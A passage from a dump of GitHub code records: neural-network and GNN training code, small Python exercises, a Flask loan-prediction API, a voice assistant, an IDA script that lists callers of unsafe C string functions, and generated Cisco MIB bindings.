+= momentum * old_out_deltas[i]\n\n old_out_deltas = output_deltas\n\n # ajusta os pesos para a camada oculta\n for i, hidden_neuron in enumerate(neural_network[0]):\n for j, input in enumerate(X + [1]):\n hidden_neuron[j] += learning_rate * hidden_deltas[i] * input\n if momentum and old_hid_deltas:\n hidden_neuron[j] += momentum * old_hid_deltas[i]\n\n old_hid_deltas = hidden_deltas\n\n num_batch = 0\n\n E_med_training.append(E_med / (2*training_len))\n\n return E_med_training\n\n#-------------------------------------------------------------------------\n\n# Questão 1\n#\n# paterns = [([0, 0, 0], [+1, -1, -1, -1, -1, -1, -1, -1]),\n# ([0, 0, 1], [-1, +1, -1, -1, -1, -1, -1, -1]),\n# ([0, 1, 0], [-1, -1, +1, -1, -1, -1, -1, -1]),\n# ([0, 1, 1], [-1, -1, -1, +1, -1, -1, -1, -1]),\n# ([1, 0, 0], [-1, -1, -1, -1, +1, -1, -1, -1]),\n# ([1, 0, 1], [-1, -1, -1, -1, -1, +1, -1, -1]),\n# ([1, 1, 0], [-1, -1, -1, -1, -1, -1, +1, -1]),\n# ([1, 1, 1], [-1, -1, -1, -1, -1, -1, -1, +1]),\n# ]\n#\n# training_set = [([x[0]+random.uniform(-1,1)/10, x[1]+random.uniform(-1,1)/10, x[2]+random.uniform(-1,1)/10], y)\n# for x, y in paterns\n# for __ in range(10)]\n#\n# input_size = 3 # vertices do cubo\n# num_hidden = 0 # não temos neurônios na camada oculta - Perceptron de Rosenblatt (Perceptron de camada única)\n# output_size = 8 # oito neurônios na camada de saída, um para cada um dos oito padroes\n#\n# # inicializa os pesos e bias para os neuronios da camada de saída - Perceptron de Rosenblatt (Perceptron de camada única)\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# learning_rate = 0.5\n# activation_fn = 'signum'\n# num_epoch = 15\n# batch_size = 1\n# momentum = 0.01\n#\n# print 'Conjunto de treinamento:', len(training_set)\n# for x, y in training_set[7:13]:\n# print x, y\n#\n# erro = backpropagation(paterns, network, learning_rate, activation_fn, num_epoch, batch_size, momentum)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# print 'Conjunto de validaçao:'\n# for input_vector, target_vector in paterns:\n# outputs = forward(network, input_vector, activation_fn)[-1]\n# print input_vector, target_vector, outputs\n#\n\n# Questão 3\n#\n# treina_xor = [([0, 0], [0]),\n# ([0, 1], [1]),\n# ([1, 0], [1]),\n# ([1, 1], [0]),\n# ]\n#\n# treina_sen = [([x],[math.sin(math.pi * x) / (math.pi * x)]) for x in [random.uniform(0,4) for _ in range(1000)]]\n#\n# input_size = 2 # entradas do XOR/sen\n# num_hidden = 6 # XOR = 2\n# output_size = 1\n#\n# # inicializa os pesos e bias para os neuronios da camada oculta e de saída\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# # parametros XOR\n# # learning_rate = 5\n# # activation_fn = 'sigmoid'\n# # num_epoch = 300\n# # batch_size = 1\n# # momentum = 0\n#\n# # parametros sen\n# learning_rate = 0.5\n# activation_fn = 'tanh'\n# num_epoch = 150\n# batch_size = 1\n# momentum = 0\n#\n#\n# print 'Conjunto de treinamento:', len(treina_sen)\n# for x, y in treina_sen[:10]:\n# print x, y\n#\n# erro = backpropagation(treina_sen, network, learning_rate, activation_fn, num_epoch, batch_size, momentum)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# print 'Conjunto de validaçao:'\n# # for input_vector, target_vector in treina_xor:\n# # outputs = forward(network, input_vector, activation_fn)[-1]\n# # print input_vector, target_vector, outputs\n#\n# x = []\n# y = []\n# z = []\n# for input_vector, target_vector in treina_sen:\n# y_pred = forward(network, input_vector, activation_fn)[-1]\n# x.append(input_vector[0])\n# y.append(target_vector[0])\n# z.append('b')\n# x.append(input_vector[0])\n# y.append(y_pred[0])\n# z.append('g')\n# plt.scatter(x,y,color=z,marker='.')\n# plt.show()\n\n#\n# Questão 4\n#\n# padrao = [[x,y] for x, y in [(random.uniform(-1,1), random.uniform(-1,1)) for _ in range(10000)] if x**2 + y**2 <= 1]\n# rotulo = [[3,7,2,6,4,8,1,5][4*(x>0)+2*(y>0)+(abs(y)>1-abs(x))] for x,y in padrao]\n# rotulo_byte = []\n# for i in rotulo:\n# #rotulo_bit = [[-1,-1,-1],[-1,-1,1],[-1,1,-1],[-1,1,1],[1,-1,-1],[1,-1,1],[1,1,-1],[1,1,1]][i-1]\n# rotulo_bit = [-1,-1,-1,-1,-1,-1,-1,-1]\n# rotulo_bit[i-1] = 1\n# rotulo_byte.append(rotulo_bit)\n#\n# padrao_rotulo = zip(padrao, rotulo_byte)\n#\n# input_size = 2 # coordenadas x,y\n# num_hidden = 6 # 1 para cada padrão de reta\n# output_size = 8 # one-of-c-classes\n#\n# # inicializa os pesos e bias para os neuronios da camada oculta e de saída\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# learning_rate = 0.5\n# activation_fn = 'signum'\n# num_epoch = 100\n# batch_size = 1\n# momentum = 0.01\n#\n# print 'Conjunto de treinamento:', len(padrao_rotulo)\n# for i in range(10):\n# print padrao[i], rotulo[i], rotulo_byte[i]\n#\n# cores = [['red','green','blue','gray','gray','blue','green','red'][4*(x>0)+2*(y>0)+(abs(y)>1-abs(x))] for x,y in padrao]\n# x = [x for x, __ in padrao]\n# y = [y for __, y in padrao]\n# plt.scatter(x,y,color=cores,marker='.')\n# plt.show()\n#\n# erro = backpropagation(padrao_rotulo, network, learning_rate, activation_fn, num_epoch,\n# batch_size, momentum)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# padrao = [[x,y] for x, y in [(random.uniform(-1,1), random.uniform(-1,1)) for _ in range(10000)] if x**2 + y**2 <= 1]\n# rotulo = [[3,7,2,6,4,8,1,5][4*(x>0)+2*(y>0)+(abs(y)>1-abs(x))] for x,y in padrao]\n#\n# print 'Conjunto de validaçao:', len(padrao)\n# y_pred = []\n# for i in range(len(padrao)):\n# outputs = forward(network, padrao[i], activation_fn)[-1]\n# y_pred.append(outputs)\n# if i < 10:\n# print padrao[i], rotulo[i], outputs\n#\n# cores = [['green','blue','red','gray','red','gray','green','blue','black'][8 if sum(y) != -6 else dot([0,1,2,3,4,5,6,7], [0 if i < 0 else 1 for i in y])] for y in y_pred]\n# #cores = [['green','blue','red','gray','red','gray','green','blue','black'][dot([4,2,1], [0 if i < 0 else 1 for i in y])] for y in y_pred]\n# x = [x for x, __ in padrao]\n# y = [y for __, y in padrao]\n# plt.scatter(x,y,color=cores,marker='.')\n# plt.show()\n#\n# y = [8 if sum(y) != -6 else dot([0,1,2,3,4,5,6,7], [0 if i < 0 else 1 for i in y]) for y in y_pred]\n#\n# print(confusion_matrix(rotulo, y))\n\n#\n# Questão 5\n#\n# ne = 10 # número de entradas anteriores\n# np = 3 # número de passos posteriores\n#\n# function_set = [math.sin(x/10 + math.sin(x/10)**2) for x in range(0,120+np)]\n#\n# treina_predicao = [([function_set[x-i] for i in range(1, ne+1)], [function_set[x+j] for j in range(0, np)]) for x in range(ne, len(function_set)-np+1)]\n#\n# input_size = ne # entradas do x(n) = sen(n + sen2(n))\n# num_hidden = ne\n# output_size = np\n#\n# # inicializa os pesos e bias para os neuronios da camada oculta e de saída\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# learning_rate = 0.25\n# activation_fn = 'tanh'\n# num_epoch = 1000\n# batch_size = 1\n# momentum = 0\n#\n# print 'Conjunto de treinamento:', len(treina_predicao)\n# for x, y in treina_predicao[:10]:\n# print x, y\n#\n# erro = backpropagation(treina_predicao, network, learning_rate, activation_fn, num_epoch,\n# batch_size) # , momentum, old_out_deltas, old_hid_deltas)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# print 'Conjunto de validaçao:'\n# x = [x/10 for x in range(0, len(function_set))]\n# y = function_set\n# z= [0 for __ in x]\n# for i in range(ne, len(function_set)-np+1):\n# input_vector = [function_set[i-j] for j in range(1, ne+1)]\n# y_pred = forward(network, input_vector, activation_fn)[-1]\n# for j in range(0, np):\n# x.append((i+j)/10)\n# y.append(y_pred[j])\n# z.append(j)\n#\n# plt.scatter(x,y,c=z,marker='.')\n# plt.show()\n","repo_name":"fabioasilva/deeplearning","sub_path":"multilayer_perceptron.py","file_name":"multilayer_perceptron.py","file_ext":"py","file_size_in_byte":14651,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9766847715","text":"import requests\nimport json\nfrom datetime import datetime\n\n\ndef cotacao(valor):\n url = \"https://economia.awesomeapi.com.br/last/USD-BRL\"\n ret = requests.get(url)\n dolar = json.loads(ret.text)[\"USDBRL\"]\n return float(dolar[\"bid\"]) * valor\n\n\nmoeda = cotacao(1)\nprint(f\"Cotacao atual: {moeda}\")\n\nwith open(\"cambio.csv\", \"a\") as file:\n file.write(f\"{datetime.strftime(datetime.now(),'%d/%m/%Y %H:%M')};{moeda}\")\n","repo_name":"karinnecristina/Engenharia_de_Dados","sub_path":"jenkins/cambio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"16049256701","text":"N, M = [int(x) for x in input().split()]\n\ndef teste_primo(x):\n divisores = 0\n for num in range(1, x+1):\n if x % num == 0:\n divisores += 1\n return divisores == 2\n \n\ndef encontra_primo(x):\n for num in range(x, 0, -1):\n if teste_primo(num):\n primo = num\n break\n return primo\n\n\nprint(encontra_primo(N) * encontra_primo(M))\n","repo_name":"BonomoJoaoPaulo/Beecrowd_problems","sub_path":"Python/2100-2199/uri2116.py","file_name":"uri2116.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29445591139","text":"ea = ScreenEA()\n\n\n# Loop through all the functions.\nfor f in Functions(SegStart(ea), SegEnd(ea)):\n\n # For each of the incoming references.\n for ref in CodeRefsTo(f, 0):\n\n \n # Get the name of the referring function.\n caller_name = GetFunctionName(ref)\n # Get the address of the referring function.\n caller_addr = GetFunctionAttr(ref, FUNCATTR_START)\n\n # Get the name of the function being called.\n called_name = GetFunctionName(f)\n \n # If the called function is any of the desired functions, print \"Name of caller function:Address of caller function:Name of called function\".\n if called_name == \"strcpy\" or called_name == \"sprintf\" or called_name == \"strncpy\" or called_name == \"wcsncpy\" or called_name == \"swprintf\":\n print(\"%s:%s:%s\\n\" %(caller_name, hex(id(caller_addr)), called_name))\n\n\n","repo_name":"mccormickc2/lab_4","sub_path":"detect_functions/detect_functions.py","file_name":"detect_functions.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33941043816","text":"from typing import NoReturn, Optional\n\nimport pytest\n\nfrom homework.hw3.task4_armstrong import is_armstrong\n\n\n@pytest.mark.parametrize(\n (\"value\", \"expected_result\"),\n [\n (153, True),\n (10, False),\n ],\n)\ndef test_is_armstrong(value: int, expected_result: bool) -> Optional[NoReturn]:\n actual_result = is_armstrong(value)\n\n assert actual_result == expected_result\n","repo_name":"featherko/epythopam","sub_path":"test/hw3/test_task4_armstrong.py","file_name":"test_task4_armstrong.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11813501939","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.nn import (GlobalAttention, LEConv, Set2Set,\n global_add_pool, global_max_pool,\n global_mean_pool)\n\nfrom models.conv import GNN_node, GNN_node_Virtualnode\n\n\nclass GNN(torch.nn.Module):\n\n def __init__(self,\n num_class,\n num_layer=5,\n emb_dim=300,\n input_dim=1,\n gnn_type='gin',\n virtual_node=True,\n residual=False,\n drop_ratio=0.5,\n JK=\"last\",\n graph_pooling=\"mean\",\n pred_head=\"cls\",\n edge_dim=-1):\n '''\n num_tasks (int): number of labels to be predicted\n virtual_node (bool): whether to add virtual node or not\n '''\n\n super(GNN, self).__init__()\n\n self.num_layer = num_layer\n self.drop_ratio = drop_ratio\n self.JK = JK\n self.emb_dim = emb_dim\n self.num_class = num_class\n self.graph_pooling = graph_pooling\n\n # if self.num_layer < 2:\n # raise ValueError(\"Number of GNN layers must be greater than 1.\")\n\n ### GNN to generate node embeddings\n if gnn_type.lower() == \"le\":\n self.gnn_node = LeGNN(in_channels=input_dim,\n hid_channels=emb_dim,\n num_layer=num_layer,\n drop_ratio=drop_ratio,\n num_classes=num_class,\n edge_dim=edge_dim)\n else:\n if virtual_node:\n self.gnn_node = GNN_node_Virtualnode(num_layer,\n emb_dim,\n input_dim=input_dim,\n JK=JK,\n drop_ratio=drop_ratio,\n residual=residual,\n gnn_type=gnn_type,\n edge_dim=edge_dim)\n else:\n self.gnn_node = GNN_node(num_layer,\n emb_dim,\n input_dim=input_dim,\n JK=JK,\n drop_ratio=drop_ratio,\n residual=residual,\n gnn_type=gnn_type,\n edge_dim=edge_dim)\n\n ### Pooling function to generate whole-graph embeddings\n if self.graph_pooling == \"sum\":\n self.pool = global_add_pool\n elif self.graph_pooling == \"mean\":\n self.pool = global_mean_pool\n elif self.graph_pooling == \"max\":\n self.pool = global_max_pool\n elif self.graph_pooling == \"attention\":\n self.pool = GlobalAttention(gate_nn=torch.nn.Sequential(torch.nn.Linear(\n emb_dim, 2 * emb_dim), torch.nn.BatchNorm1d(2 *\n emb_dim), torch.nn.ReLU(), torch.nn.Linear(2 * emb_dim, 1)))\n elif self.graph_pooling == \"set2set\":\n self.pool = Set2Set(emb_dim, processing_steps=2)\n else:\n raise ValueError(\"Invalid graph pooling type.\")\n\n if pred_head == \"cls\":\n if graph_pooling == \"set2set\":\n self.graph_pred_linear = torch.nn.Linear(2 * self.emb_dim, self.num_class)\n else:\n self.graph_pred_linear = torch.nn.Linear(self.emb_dim, self.num_class)\n elif pred_head == \"inv\":\n self.graph_pred_linear = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n\n self.spu_mlp = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n self.cq = nn.Linear(self.num_class, self.num_class)\n self.spu_fw = torch.nn.Sequential(self.spu_mlp, self.cq)\n elif pred_head == \"spu\":\n self.graph_pred_linear = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n self.spu_gcn = GNN_node(num_layer=1,\n emb_dim=emb_dim,\n input_dim=emb_dim,\n JK=JK,\n drop_ratio=drop_ratio,\n residual=residual,\n gnn_type=gnn_type)\n self.spu_mlp = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n self.cq = nn.Linear(self.num_class, self.num_class)\n self.spu_fw = torch.nn.Sequential(self.spu_mlp, self.cq)\n\n def get_spu_pred_forward(self, batched_data, get_rep=False):\n # if using DIR, won't consider gradients for encoder\n # h_node = self.gnn_node(batched_data)\n # h_graph = self.pool(h_node, batched_data.batch).detach()\n h_node = self.spu_gcn(batched_data)\n h_graph = self.pool(h_node, batched_data.batch)\n\n if get_rep:\n return self.spu_fw(h_graph), h_graph\n return self.spu_fw(h_graph)\n\n def get_spu_pred(self, batched_data, get_rep=False):\n # if using DIR, won't consider gradients for encoder\n h_node = self.gnn_node(batched_data)\n h_graph = self.pool(h_node, batched_data.batch).detach()\n\n if get_rep:\n return self.spu_fw(h_graph), h_graph\n return self.spu_fw(h_graph)\n\n def forward(self, batched_data, get_rep=False):\n h_node = self.gnn_node(batched_data)\n\n h_graph = self.pool(h_node, batched_data.batch)\n\n if get_rep:\n return self.graph_pred_linear(h_graph), h_graph\n return self.graph_pred_linear(h_graph)\n\n def forward_rep(self, batched_data):\n h_node = self.gnn_node(batched_data)\n h_graph = self.pool(h_node, batched_data.batch)\n return h_graph\n\n def forward_cls(self, h_graph):\n return self.graph_pred_linear(h_graph)\n\n def forward_spu_cls(self, h_graph):\n return self.spu_fw(h_graph)\n\n def forward_cl(self, batched_data):\n h_node = self.gnn_node(batched_data)\n\n h_graph = self.pool(h_node, batched_data.batch)\n z = self.proj_head(h_graph)\n return z\n\n def loss_cl(self, x1, x2):\n T = 0.5\n batch_size, _ = x1.size()\n\n x1_abs = x1.norm(dim=1)\n x2_abs = x2.norm(dim=1)\n\n sim_matrix = torch.einsum('ik,jk->ij', x1, x2) / torch.einsum('i,j->ij', x1_abs, x2_abs)\n sim_matrix = torch.exp(sim_matrix / T)\n pos_sim = sim_matrix[range(batch_size), range(batch_size)]\n loss = pos_sim / (sim_matrix.sum(dim=1) - pos_sim)\n loss = -torch.log(loss).mean()\n return loss\n\n\nclass LeGNN(torch.nn.Module):\n\n def __init__(self, in_channels, hid_channels=64, num_classes=3, num_layer=2, drop_ratio=0.5, edge_dim=-1):\n super().__init__()\n\n self.num_layer = num_layer\n self.node_emb = nn.Linear(in_channels, hid_channels)\n self.drop_ratio = drop_ratio\n self.convs = nn.ModuleList()\n self.relus = nn.ModuleList()\n for i in range(num_layer):\n conv = LEConv(in_channels=hid_channels, out_channels=hid_channels)\n self.convs.append(conv)\n self.relus.append(nn.ReLU())\n\n def forward(self, batched_data):\n x, edge_index, edge_attr, batch = batched_data.x, batched_data.edge_index, batched_data.edge_attr, batched_data.batch\n\n node_x = self.get_node_reps(x, edge_index, edge_attr, batch)\n return node_x\n\n def get_node_reps(self, x, edge_index, edge_attr, batch):\n x = self.node_emb(x)\n for conv, ReLU in zip(self.convs, self.relus):\n x = conv(x=x, edge_index=edge_index, edge_weight=edge_attr)\n x = F.dropout(x, p=self.drop_ratio, training=self.training)\n x = ReLU(x)\n node_x = x\n return node_x\n\n def get_graph_rep(self, x, edge_index, edge_attr, batch):\n\n node_x = self.get_node_reps(x, edge_index, edge_attr, batch)\n graph_x = global_mean_pool(node_x, batch)\n return graph_x\n\n def get_causal_pred(self, causal_graph_x):\n pred = self.causal_mlp(causal_graph_x)\n return pred\n\n def get_spu_pred(self, spu_graph_x):\n pred = self.spu_fw(spu_graph_x)\n return pred\n\n def get_comb_pred(self, causal_graph_x, spu_graph_x):\n causal_pred = self.causal_mlp(causal_graph_x)\n spu_pred = self.spu_mlp(spu_graph_x).detach()\n return torch.sigmoid(spu_pred) * causal_pred\n\n def reset_parameters(self):\n with torch.no_grad():\n for param in self.parameters():\n param.uniform_(-1.0, 1.0)\n\nif __name__ == '__main__':\n GNN(num_class=10)\n","repo_name":"LFhase/CIGA","sub_path":"models/gnn.py","file_name":"gnn.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"48"} +{"seq_id":"71672097747","text":"import numpy as np\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\nimport pandas as pd\nfrom flask_cors import CORS, cross_origin\n\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nmodel = pickle.load(open('model.pkl', 'rb'))\nmodel2 = pickle.load(open('model2.pkl', 'rb'))\n\n@app.route('/')\ndef home():\n return \"App is Working\"\n\n\n\n@app.route('/predict_api',methods=['POST'])\n@cross_origin()\ndef predict_api():\n '''\n For direct API calls trought request\n '''\n data = request.get_json(force=True)\n print(data.values())\n prediction = model.predict(pd.DataFrame([np.array(list(data.values()))]))\n prediction_prob = model.predict_proba(pd.DataFrame([np.array(list(data.values()))]))\n\n isDefault = int(prediction[0])\n prob = float(prediction_prob[0][0])\n\n \n\n ret ={\n 'is_deafult': isDefault,\n 'safe_factor': prob,\n 'safe_amount': calculate_amount(data) if isDefault==1 else data['FINANCE_AMOUNT'],\n 'arreas_rentals': get_arreas_rentals(data) if isDefault==1 else -1\n }\n \n return jsonify(ret)\n\ndef calculate_amount(data):\n finance_amout=[data['FINANCE_AMOUNT']]\n probs =[1]\n i=0\n\n while probs[-1]>=0.5:\n curr_amount = finance_amout[-1]-5000\n if(curr_amount< finance_amout[0]/2):\n return curr_amount\n data['FINANCE_AMOUNT'] = curr_amount\n finance_amout.append(curr_amount)\n p = model.predict_proba(pd.DataFrame([np.array(list(data.values()))]))\n probs.append(p[0][1])\n print(\"Amount: \", curr_amount, \"prob: \",p[0][1])\n i+=1\n return finance_amout[-1]\n\n\ndef get_arreas_rentals(data):\n arreas_rentals = int(model2.predict(pd.DataFrame([np.array(list(data.values()))]))*data['NO_OF_RENTAL'])\n return arreas_rentals\n\n \n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"JayodKavinda/loan-flask-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36893735768","text":"import day13put\r\nimport numpy as np\r\ninput_used = day13put.input1\r\ncoords = input_used[0]\r\nfolds = input_used[1]\r\n\r\nxmax, ymax = max([tup[0] for tup in coords]) +1, max([tup[1] for tup in coords]) +1\r\narray1 = np.zeros((xmax, ymax))\r\nprint(array1.shape)\r\nfor coord in coords:\r\n array1[(coord)] = 1\r\n\r\ndef fold_in_half(array, axis):\r\n halves = np.array_split(array, 2, axis=fold_axis)\r\n dotsonhalve2 = np.where(np.flip(halves[1], axis=fold_axis) == 1)\r\n for dot in np.nditer(dotsonhalve2):\r\n halves[0][dot] = 1\r\n result = np.delete(halves[0], (-1), axis=fold_axis)\r\n return result\r\n\r\nfolded_array = array1\r\nprint(f'{folded_array.T}\\n')\r\nprint(folded_array.shape)\r\n\r\n# for fold in folds:\r\nfor i in range(1):\r\n fold = folds[0]\r\n\r\n fold_axis = 0 if not fold[1] else 1\r\n folded_array = fold_in_half(folded_array, fold_axis)\r\n print(f'{folded_array.T}\\n')\r\n print(folded_array.shape)\r\n print(f'number of dots = {len(np.where(folded_array == 1)[0])}')\r\n\r\n","repo_name":"vakansie/adventofcode2021","sub_path":"day13-1.py","file_name":"day13-1.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1071506178","text":"import os\nimport time\nimport speech_recognition as sr\nfrom fuzzywuzzy import fuzz\nimport pyttsx3\nimport datetime\n\n\noptions = {\n \"alias\": (\"alexey\", \"alex\", \"lyosha\", \"lesha\", \"leha\", \"lyoha\",\n \"leshidze\"),\n \"to_be_removed\": (\"say\", \"tell\", \"show\", \"what\", \"how\"),\n \"commands\": {\n \"current_time\": (\"current time\", \"time is it\")\n }\n}\n\n\ndef speak(phrase_to_speak):\n \"\"\" pyttsx3 saying function. \"\"\"\n print(phrase_to_speak)\n speak_engine.say(phrase_to_speak)\n speak_engine.runAndWait()\n speak_engine.stop()\n\n\ndef callback(recognizer, audio):\n \"\"\" Basic audio recognition. \"\"\"\n try:\n voice = recognizer.recognize_google(audio, language=\"en-EN\").lower()\n print(\"[log] Recognized: \" + voice)\n\n if voice.startswith(options[\"alias\"]):\n command = voice\n\n for option in options[\"alias\"]:\n command = command.replace(option, \"\").strip()\n\n for option in options[\"to_be_removed\"]:\n command = command.replace(option, \"\").strip()\n\n command = recognize_command(command)\n execute_command(command[\"command\"])\n\n except sr.UnknownValueError:\n print(\"[log] Voice isn't recognized!\")\n except sr.RequestError:\n print(\"[log] Unexpected error, check your connection!\")\n\n\ndef recognize_command(command):\n \"\"\" Command recognition. \"\"\"\n RC = {\"command\": \"\", \"percent\": 0}\n for cmd, value in options['commands'].items():\n for option in value:\n vrt = fuzz.ratio(command, option)\n if vrt > RC[\"percent\"]:\n RC[\"command\"] = cmd\n RC[\"percent\"] = vrt\n\n return RC\n\n\ndef execute_command(command):\n \"\"\" Command execution. \"\"\"\n if command == \"current_time\":\n now = datetime.datetime.now()\n speak(\"Now is \" + str(now.hour) + \":\" + str(now.minute))\n\n else:\n speak(\"I don't know this command, could you repeate?\")\n\n\n# Initialization.\nrecognizer = sr.Recognizer()\nmicrophone = sr.Microphone(device_index=5)\n\nwith microphone as source:\n recognizer.adjust_for_ambient_noise(source)\n\nspeak_engine = pyttsx3.init()\n\nspeak(\"Welcome, I am Alexey, how can I help you?\")\n\n# Non-stop command listenning.\nstop_listening = recognizer.listen_in_background(microphone, callback)\nwhile True:\n time.sleep(0.1)\n","repo_name":"hackfeed/alexey-voice-assistant","sub_path":"assistant.py","file_name":"assistant.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11677334287","text":"\"\"\" CISCO_IPMROUTE_MIB \n\nThe MIB module for management of IP Multicast routing,\nbut independent of the specific multicast routing protocol\nin use.\n\n\"\"\"\nfrom ydk.entity_utils import get_relative_entity_path as _get_relative_entity_path\nfrom ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\nfrom ydk.filters import YFilter\nfrom ydk.errors import YPYError, YPYModelError\nfrom ydk.errors.error_handler import handle_type_error as _handle_type_error\n\n\n\nclass CiscoIpmrouteMib(Entity):\n \"\"\"\n \n \n .. attribute:: ciscoipmroute\n \n \t\n \t**type**\\: :py:class:`Ciscoipmroute `\n \n .. attribute:: ciscoipmrouteheartbeattable\n \n \tThe (conceptual) table listing sets of IP Multicast heartbeat parameters. If no IP Multicast heartbeat is configured, this table would be empty\n \t**type**\\: :py:class:`Ciscoipmrouteheartbeattable `\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib, self).__init__()\n self._top_entity = None\n\n self.yang_name = \"CISCO-IPMROUTE-MIB\"\n self.yang_parent_name = \"CISCO-IPMROUTE-MIB\"\n\n self.ciscoipmroute = CiscoIpmrouteMib.Ciscoipmroute()\n self.ciscoipmroute.parent = self\n self._children_name_map[\"ciscoipmroute\"] = \"ciscoIpMRoute\"\n self._children_yang_names.add(\"ciscoIpMRoute\")\n\n self.ciscoipmrouteheartbeattable = CiscoIpmrouteMib.Ciscoipmrouteheartbeattable()\n self.ciscoipmrouteheartbeattable.parent = self\n self._children_name_map[\"ciscoipmrouteheartbeattable\"] = \"ciscoIpMRouteHeartBeatTable\"\n self._children_yang_names.add(\"ciscoIpMRouteHeartBeatTable\")\n\n\n class Ciscoipmroute(Entity):\n \"\"\"\n \n \n .. attribute:: ciscoipmroutenumberofentries\n \n \tMaintains a count of the number of entries in the ipMRouteTable\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \n\n \"\"\"\n\n _prefix = 'CISCO-IPMROUTE-MIB'\n _revision = '2005-03-07'\n\n def __init__(self):\n super(CiscoIpmrouteMib.Ciscoipmroute, self).__init__()\n\n self.yang_name = \"ciscoIpMRoute\"\n self.yang_parent_name = \"CISCO-IPMROUTE-MIB\"\n\n self.ciscoipmroutenumberofentries = YLeaf(YType.uint32, \"ciscoIpMRouteNumberOfEntries\")\n\n def __setattr__(self, name, value):\n self._check_monkey_patching_error(name, value)\n with _handle_type_error():\n if name in self.__dict__ and isinstance(self.__dict__[name], YList):\n raise YPYModelError(\"Attempt to assign value of '{}' to YList ldata. \"\n \"Please use list append or extend method.\"\n .format(value))\n if isinstance(value, Enum.YLeaf):\n value = value.name\n if name in (\"ciscoipmroutenumberofentries\") and name in self.__dict__:\n if isinstance(value, YLeaf):\n self.__dict__[name].set(value.get())\n elif isinstance(value, YLeafList):\n super(CiscoIpmrouteMib.Ciscoipmroute, self).__setattr__(name, value)\n else:\n self.__dict__[name].set(value)\n else:\n if hasattr(value, \"parent\") and name != \"parent\":\n if hasattr(value, \"is_presence_container\") and value.is_presence_container:\n value.parent = self\n elif value.parent is None and value.yang_name in self._children_yang_names:\n value.parent = self\n super(CiscoIpmrouteMib.Ciscoipmroute, self).__setattr__(name, value)\n\n def has_data(self):\n return self.ciscoipmroutenumberofentries.is_set\n\n def has_operation(self):\n return (\n self.yfilter != YFilter.not_set or\n self.ciscoipmroutenumberofentries.yfilter != YFilter.not_set)\n\n def get_segment_path(self):\n path_buffer = \"\"\n path_buffer = \"ciscoIpMRoute\" + path_buffer\n\n return path_buffer\n\n def get_entity_path(self, ancestor):\n path_buffer = \"\"\n if (ancestor is None):\n path_buffer = \"CISCO-IPMROUTE-MIB:CISCO-IPMROUTE-MIB/%s\" % self.get_segment_path()\n else:\n path_buffer = _get_relative_entity_path(self, ancestor, path_buffer)\n\n leaf_name_data = LeafDataList()\n if (self.ciscoipmroutenumberofentries.is_set or self.ciscoipmroutenumberofentries.yfilter != YFilter.not_set):\n leaf_name_data.append(self.ciscoipmroutenumberofentries.get_name_leafdata())\n\n entity_path = EntityPath(path_buffer, leaf_name_data)\n return entity_path\n\n def get_child_by_name(self, child_yang_name, segment_path):\n child = self._get_child_by_seg_name([child_yang_name, segment_path])\n if child is not None:\n return child\n\n return None\n\n def has_leaf_or_child_of_name(self, name):\n if(name == \"ciscoIpMRouteNumberOfEntries\"):\n return True\n return False\n\n def set_value(self, value_path, value, name_space, name_space_prefix):\n if(value_path == \"ciscoIpMRouteNumberOfEntries\"):\n 